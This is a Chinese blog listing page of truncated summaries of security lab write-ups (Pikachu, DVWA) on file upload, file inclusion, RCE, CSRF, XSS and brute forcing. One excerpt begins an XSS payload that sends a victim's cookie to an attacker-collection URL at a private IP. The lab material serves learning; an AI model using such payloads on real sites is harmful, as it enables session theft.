摘要: 0x00 不安全的文件上传漏洞概述不安全的文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 比如上传头 阅读全文
posted @ 2020-02-14 23:28 Res0lve 阅读(503) 评论(0) 推荐(0) 编辑
摘要: Pikachu-Unsafe Filedownload 不安全的文件下载 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成 阅读全文
posted @ 2020-02-14 23:07 Res0lve 阅读(231) 评论(0) 推荐(0) 编辑
摘要: 文件包含漏洞: File Inclusion 本地文件包含漏洞 远程文件包含漏洞 根据不同的配置环境,文件包含漏洞分为如下两种情况: 1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的, 因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读 阅读全文
posted @ 2020-02-14 22:23 Res0lve 阅读(440) 评论(0) 推荐(0) 编辑
摘要: RCE remote command/code execute 远程系统命令/ 代码执行 系统从设计上需要给用户提供指定的远程命令操作的接口。可以测试一下自动运维平台。 在PHP中,使用system、exec、shell_ exec、passthru、pcntl_exec、popen、proc_po 阅读全文
posted @ 2020-02-14 19:54 Res0lve 阅读(681) 评论(0) 推荐(0) 编辑
摘要: CSRF 在CSRF攻击场景中攻击者会伪造一个请求 (一个链接) 然后欺骗目标用户点击,用户一旦点击了这个请求,整个攻击也就完成了 所以CSRF攻击也被称为“one click“攻击 例子: 想要修改lucy购物地址信息 lucy必须处于登录的状态,lucy必须点击攻击链接 xss和csrf区别: 阅读全文
posted @ 2020-02-14 19:18 Res0lve 阅读(359) 评论(0) 推荐(0) 编辑
摘要: xss后台的安装 重定向到另一个可信网址 让点击者 不知情 1.cookie值获取 查看源代码 在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie= 阅读全文
posted @ 2020-02-12 17:24 Res0lve 阅读(3413) 评论(0) 推荐(0) 编辑
摘要: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; 危害: 存储型>反射型>DOM型 1.反射型XSS(get 阅读全文
posted @ 2020-02-12 15:25 Res0lve 阅读(552) 评论(0) 推荐(0) 编辑
摘要: 第一步链接数据库 修改配置文件,重置数据库~ 基于表单的暴力破解 进入暴力破解的子选项:基于表单的暴力破解。我们可以看到如下界面 我们随便输入信息然后设置代理用burp suite 进行拦截数据包。 发送到Intruer模块。 这里简单介绍一下Intruer模块。里面有四个选项卡,分别是: atta 阅读全文
posted @ 2020-02-11 17:27 Res0lve 阅读(1034) 评论(0) 推荐(0) 编辑
摘要: Insecure CAPTCHA Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。 阅读全文
posted @ 2020-02-10 22:41 Res0lve 阅读(429) 评论(0) 推荐(0) 编辑
摘要: File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 LOW:代码 阅读全文
posted @ 2020-02-10 19:11 Res0lve 阅读(527) 评论(0) 推荐(0) 编辑